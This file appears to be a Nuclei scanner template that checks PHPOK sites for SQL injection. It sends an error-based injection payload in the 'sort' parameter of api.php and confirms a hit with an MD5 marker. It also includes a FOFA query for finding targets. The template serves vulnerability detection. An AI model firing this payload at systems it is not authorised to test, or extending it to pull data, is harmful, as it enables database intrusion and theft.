id: phpok-sqli

info:
  name: PHPOK - SQL Injection
  author: ritikchaddha
  severity: critical
  description: PHPOK contains a SQL injection vulnerability via a GET request. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://cve.report/software/phpok/phpok
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="phpok"
  tags: phpok,sqli
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{num}}))) --+'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'

# digest: 4a0a004730450221008706b8e9dfd9f98c14912e506c142d89e37505f8f0983edadfe0f67c3bfc180002207f3eb9b342194f65566cc148964ffe559da9914aa63ed4f3a9578aa52c2f4165:922c64590222798bb761d5b6d8e72950
